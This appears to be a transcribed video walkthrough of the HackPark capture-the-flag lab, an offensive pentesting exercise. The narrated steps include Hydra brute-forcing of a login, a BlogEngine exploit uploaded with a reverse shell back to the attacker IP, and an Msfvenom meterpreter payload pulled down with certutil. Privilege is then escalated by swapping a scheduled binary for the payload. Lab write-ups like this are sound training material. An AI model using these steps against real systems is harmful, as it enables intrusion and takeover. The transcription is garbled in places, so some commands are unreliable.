Alright, in this video, we're gonna work on HackPark. HackPark is part of the offensive pentesting learning path. And, well, just like every other room, we're gonna start with Nmap. First thing first, I search for the TCP connection with the ST flag and SV for the version of each service. -A for aggressive or all the information I could get. -T4 for threat 4, which is the more aggressive scan. -V for verbose, so I get all the texts that are available or most of the text, and -P- for all the ports that are open. I actually did most of this room in here already. If you could see here, this is all I have, but I'm just gonna show you the step-by-step on how I get here. I actually copy the Nmap scan. There are only 2 ports available here. We either have to wait or show this. I prefer just did this room ahead because I knew it's gonna be a long room. The moment I see this part where it's say on the last part here where it's say privilege escalation without metasploit, I just knew it's gonna be a long room. Yeah, it was a pretty long room, but with good note taking. I'm actually gonna show you how I take my note for this room. So this is my note for this room, and it is something I'm actually feel better about because since the first time I ever done any CTF, you know, my note taking was very lacking, and now it has improved. And it's gonna show step by step because I'm actually gonna try to do this over and over again until I understand how all of this work. So yeah, that is all my notes that are available. Unfortunately though, I still cannot solve the the last task without using Msfvenom. I know they only require to just do the task without metasploit, but I just want to also not do an Msfvenom. But whatever. For the first answer, task 1, well, this is very telling. If you look at the logo on HackPark, if you recognize that face, it has to be Pennywise. But if you're not recognizing him, you could also navigate to the site by just using the IP, and you could actually copy the image and reverse search image. I'm gonna do this step. Actually, you have to paste it, go to slate, and there you go, the wave of evil clown. Well, this is actually an actual new, but if you recognize this face, you know who it is. It is Pennywise. But you know, there's way to reverse search this, but for some reason it doesn't show on this on Tinai for some reason. That is funny. But you know, if they Pennywise, oh, and that's it. That is Pennywise. Not the best looking guy you want to look at. So yeah, let's just skip this part. So what I did was just pressing on this sandwich kind of looking logo for more information, and you could find the login. By then, you could, you know, you all know this part where you could have to brute force. So we have to brute force this by just testing here. It's a logging fail. So what we have to do is, since the scan is already ready to, there's only 2 ports, so that's not gonna be a lot for us to work on other than getting the initial cell on the site. You could turn on burp sweep. I'm gonna use the ampersand at the end of burp sweep to just end this whole line here, so you could continue using these tab on the terminal while having burp suite open, and start the burp suite, and also start the burp suite proxy on Foxy proxy. We simply gonna use whatever password, it doesn't matter. First thing first, we have to intercept turn on and intercept this. So yeah, we could send it to repeater. You know you have to brute force, so brute force is our only option here. And if you go to task 2 using Hydra to brute force a login, what request type is the window website login form using? Look here, it is post, so the answer is post. And now we know the request type and have a URL for the login form. We can start brute forcing an account running the following command. Alright, with a bit of finesse, we found our syntax. And it is start with Hydra-L admin, because in the hint of the question, it's already tell you that is the username is admin, but what is the password? We could also try to guess it through the first post on the site. Let's say administrator. So it is admin. I'm actually already done the brute forcing here. Our syntax going to be -p for password, and we're gonna type out for the pass for rocku.txt. If your Kali VM is new, you have to extract rocku.txt from the zip file and type out the IP. It is 10.10.93.36. This is the target IP on my end. I'm actually gonna not looking at this. I don't want to look at this cloud, but we're gonna put a quotation mark here and tab out account login.aspx. So what happened is every time you press the login here, it actually sends you to admin, but just delete this admin and intercept it on your burp suite. If you could see here, there's no admin. It shouldn't say admin, so you could brute force it and then put a colon here and copy the view state, which is from the intercept on burp suite. And what you have to do, first thing first, is find the username. It's equal sign, so you have to put shift-6, which is this up arrow sign here, and type out user and then another up arrow sign, and then find password here and type another shift-6 and then put a pass for password and another shift-6, and we're gonna end it with another colon, login fail. So login fail is basically every time you try to log in with the wrong credential, it's going to show you login fail, and then end the quotation mark and put a -f for every successful brute force. This brute force process going to end. Explanation here, Hydra going to try to brute force with the credential we provide it, and every time it fails, it's gonna see this login fails here. That means it's gonna keep brute forcing until it find the right credential. And this is our credential here. It is admin password 1QAZ2WSX. It is admin 1QAZ2WSX. Login. Okay, once we log in, if you view the source on just the IP alone, you scroll down and you see block engine 3.3.6.0, which is the version of this block engine here. And all we have to do is search for block engine and then exploit. I mean, it's already show you here, which is kind of funny. But yeah, so this exploit is available on exploit database or exploit DB, and we simply going to have to copy this whole raw file here. You could also view raw and copy this whole thing. I already done mine, and we paste it onto our notepad or our node software program. And what we have to do is name it as postview.ascx. So if you read the first couple lines here, it's telling you to actually go to this link once you log in. So again, we go back to the admin page that we just logged into. So where can we find where to upload our file here? What we have to do is go to dashboard, content, and then go to new. If you can see here, there's a file called file manager. That's where we could upload stuff. And if you go back to read the exploit, you note that app data /file is exactly this path. And also the reason why we want to name our script, our exploit script, as postview.ascx is because of the exploit suggests us to do so. Before we upload, what we have to do is type out our IP in this section here. So just scroll down for a little bit and you can see this part. I'm gonna zoom in for you. It should say TCP. It say here net socket TCP client equal new system.net socket TCP client, which is this is where we could type our IP here. Mine is 10.13.47.211 and then 66.77 is our port. While before we do that, we have to type out our netcat with the port 6677. Have that listen, upload the file, I save mine to a special directory just for the room. So you can see postview.ascx, upload that, and then complete it. So you're done here without doing anything. You should be all set. So to start the shell is we copy this part here. It's a question mark theme equal sign dot dot forward slash dot dot app data file. So this is a directory traversal exploit. So we're gonna go to here and type this out. You already typed this out. I'm just gonna paste this path here. So when it runs, you can see it stalling, that it's not actually going anywhere. What happened is we get our shell. So for the second question on this task 3 here, what if the CVE? We look at the CVE here and it's a 2019 6714. So we type out the CVE and who is the web server running as? We simply gonna type who am I, and there it is, ISS app pool /blog, which is our answer here. Next up is we have to generate a metasploit payload with Msfvenom. So this is how I create my payload for the executable. So it is, Msfvenom -p for payload, window /meterpreter /reverse TCP for the stage payload that I just create. And for architects, it is x86 for the encoder, x86 Picada Ganai, and the L host, it is our IP, it is 10.13.47.211. This is our machine IP, and then we're gonna set the L port to 888, whatever port you want to set to, and then we're gonna put -f for the file. It is xcx, and -o or format, I think it's -f is format xcx, and then -o for the shell.xcx. So if you ls instead of dir, I keep using dir. I know I'm attacking Windows machine, but I'm on a Linux. But anyways, this is our shell.xcx here. Once we have that ready, we could launch our metasploit and it's a console -q. I put a tag q here to get a quiet shell. As you can see here, you don't see any logo or anything. And we're gonna simply use exploit multi-handler, and we're gonna type our option to look at the option. And for the local host, it is, set L host to our machine. So basically we want to start this like a netcat, but a more stable netcat, and then set L port to 8888, while also set our payload corresponding to our payload that we just create, which is Windows Meterpreter reverse TCP. So we're gonna look at the option again, and that is we have our payload set, our L port set to our machine, and the port. So once that's done, you could either, try to look for the user text. I don't want to do it yet, but I'm just gonna try to upload our shell. So the only way you could upload our shell is to start a Python server. Keep in mind that I start the Python server at the path of the folder here where I store all the payload. You can see here shell.xcx it's at thm HackPark. So I start the Python server, and on our initial shell, we have to use certutil to download our shell.xcx. So let me try to find the command. There we go. So before we upload our shell, we have to cd to either window temp or user public, and then we could type out certutil.xcx tag URL cache tag f and our URL of our machine server that we just start here, and then port 8000 / shell.xcx and output it to shell.xcx. As you can see here, it is being downloaded, and we could dir to look at it. So this is ready. We could run our metasploit to start listening, and then we could simply type /shell.xcx to start the stage of the reverse shell meterpreter. And here we are. We on reverse shell. So we are basically, well, let me type shell. And then who am I? We still app pool. So we still ISS app pool /block. So we're not escalate the privilege yet, but this is where it come handy because the interpreter will give you a lot of room to move along in terms of privilege escalating. Let me try PS. PS is not recognized. Okay, I'm gonna terminate the shell, but I'm gonna stay on the interpreter. And what we have to do is to answer this OS question here, we can type, first thing first, we could type for help. And again, since we are interpreter, we have a lot of room to work on. And that's why I like Meterpreter or Metasploit in general. It's really good for just pen testing or just simply try to do a privilege escalation. So if you can see all of this, I think the most important one right now for us is to get the window version. So here you can see here it's a system info or sysinfo to get the information about the remote system. All we have to do is type out the sysinfo. There it is. This is the window version. For some reason, you don't need to type out server, so just type out window 2012 R2 and 6.3 build 9600, and then we could type out PS. And what you want to look at here, sometimes this give very limited or minimal information about what we're looking at. We could type PS again and see nothing. So I'm going to go to shell and see the out first there. And to look at the abnormal servers, we have to go to program file.x86. So cd to program file x86 dir, and just from the look of this alone, you can see this date here. Everything is at 2013 or 2014. But you can see this here, it's a 2019, and it is the folder of system scheduler. And we could suspect this kind of run like a cron tab because it's scheduled some sort of task. So you could dir again, and we looks here, and it's a VS scheduler.xex. Actually, it's right here. So what I did was copy this and actually Google it, and I looked to this second link here. Bleeping Computer is a really good site, and on the description here, I could zoom in for you real quick, and it's a Windows scheduler. So if you want to answer this question here, what is the name of the abnormal service running? It is Windows scheduler. So we could upload the WinP here. I saved mine in the same directory path. It is home Kali, so I have to upload home Kali phm HackPark and then WinPs.xex to WinPs.xex. It's gonna upload, and we get dirt. You can see that WinP is successfully upload. We could run WinPs. Actually, we have to go to shell and type out ./WinPs.xex. Let it run. So with a bit of wait, linp gonna pretty much enumerate and tell you what's runnable here. So to find the answer for the binary that you're supposed to exploit, all we have to do is scroll and scroll and scroll up to find the line where it says auto run. Let's see here. So there it is. Check you could modify other user auto run binary. Note that it is normal that you can modify the HKCU registry and binary indicate there. So you look at the folder here, it says system scheduler. Again, it is the same path of the Windows scheduler.xex and logon. So this is the answer. For some reason, every time I type PS, I can't get the user or architecture or path from this like the last time I did it on this room when I was taking note, but it should show us something like this. So it should show us something like this like the last time I did it, but for some reason this time it doesn't show, as you can see here, if you type PS, it's not only it show you the architecture, it's also show us the user and the password. So it's program. So it is the pathway to the message.xex. That's why I suspect it is the message.xex, but not this time. So anyways, we're gonna find a way to exploit this, the server, the message.xex. What we have to do is look up message.xex exploit. It's really that simple. And the first one here, it's a Splinterware System Schedule Pro. And basically, we going to have to move our shell to message.xex and basically inject the command and then replace it with a fake message.xex. So to exploit the message.xex, what we have to do is cd to program file x86 system scheduler, and then I print the directory just to make sure, and then we could type out move mv, which is move message.xex, and then message.bad, and then we can move the message, actually not the message, it is the user, our shell, which is user public shell.xex, and then type out the message.xex. What we gonna do is move this xex to a message.bat. So this is legit binary, but we change it to bat, and now we're gonna replace the shell.xex to the actually legit message.xex. So again, maybe it's /. Let me check. Oh, there we go. And then we can dirt. So just to make sure, again, this is the legit binary, but we changed the extension to bad, and we can replace it with our shell and then message.xex. So now we could exit from the interpreter and then run again and wait for the Windows scheduler to run. So it's gonna be like 30-second wait, and we wait, and there it is. So what happened is, this process, the Windows scheduler, will act like a cron tab on Linux, and it's auto run the message.xex, but we replaced the legit one to a bad extension, and we replace it with our shell.xex. So once it run again, our metasploit interpreter listening to it and grab basically a root privilege. So once I type shell, there it is, and you type who am I, it doesn't really show anything, but it is basically the highest privilege available on this machine. So by doing so, I could cd out and then cd to user administrator, just the proof here. I could dir cd to desktop, dir again. There it is. This is our root file. So I could just type it through that text, and I'm actually gonna blur half of it just to prove that I have the flag, and this is our flag here. And we can cd out there again to find Jeff. We can cd to Jeff desktop and type out user.text, and I'm gonna also blur half of this and then paste out the flag, and there it is. The room is done. But if you're feeling happy and want to do the non-metasploit one, you could also do so. WinPs, but this time it is a bat file. So if you can see here, winp.bat, winps.bat. It's basically usable on a initial shell like this instead of a metasploit shell. I actually prefer the metasploit one, but this is come in handy, especially when you're on the web shell. So again, it is downloaded, and the way we could run on this initial shell is type winps.bat with 2 dot. Well, not that way. It actually with 1 dot, I think. winp.bats, and we could start the winp here. Again, this is less I mean, it's give you a ton of information still, but it doesn't highlight any vulnerable that we could work on like the other one. But, since also, I just wanted to note that the window exploit suggester script here is out of date. So if you want to use it, I can use mine for some reason because it's not only it's outdated. I tried the Python 3 version on GitHub. You can look it up on GitHub for a Python 3 version, but it still doesn't work for me. But if you want to answer this question here using WinPs, what if the original install time is after you launch the winp.bat here? You scroll down and look at this line. Original install date. It is 8/3/19. So 8/3/19 is the answer, and 10:43:23 a.m. is the time. All right, finally. So I went ahead and actually start a new machine and do every other step. Basically the web shell step, and then basically what I did was, you see all this try here, but I generate another payload, but this time I used the shell reverse TCP, but with the same kind of encoder, but change the port to 9999, and start the web shell and cert util to message.xex. So you can see here message.xex. Let me dirt. Yeah, it is started. Hey, there we go. And it's quite simple with the Msfvenom, but for OSCP, you can only use metasploit or Msfvenom once for one machine. So I don't get why we have to do this, but it works anyways. It is the same thing. Once you cert util the message.xex payload, which is this payload we generated, it's basically auto run. It's kind of like a cron tab. It's auto run. It's gonna give us a reverse shell to root, or basically root, kind of like root. If I cd to out and user administrator, I forgot the cd, and then dir again, and cd desktop. I'm already in. I knew I'm already in, but see, there it is. It's root.txt again. So it's basically upload another metasploit generator. If you see me doing all of this was with the old machine. I actually start a new one just in case, so it's completely fresh, and basically do the same step from the interpreter. It's just this one, you just cert util directly to system scheduler directory, and there it is. We replace the legit message.xex with the shell.xex here. You see the size of this, it's much smaller, 73,802 compared to the 536,992. So it's much smaller, and this one's gonna give us the reverse shell. And there we go with task 5. It is, well, I wouldn't say it's unnecessary, but for OSCP, I think it's not necessary. Yes, you could do, after you do this Msfvenom once, you're basically done. You don't have the option to do Msfvenom again. So if I'm doing OSCP, I would play my card as conservatively as possible. Only reserve the metasploit and Msfvenom for the hardest machine, which is probably the Active Directory one. And anyways, that is it for this room. I hope you solve it and have a fantastic day. See ya.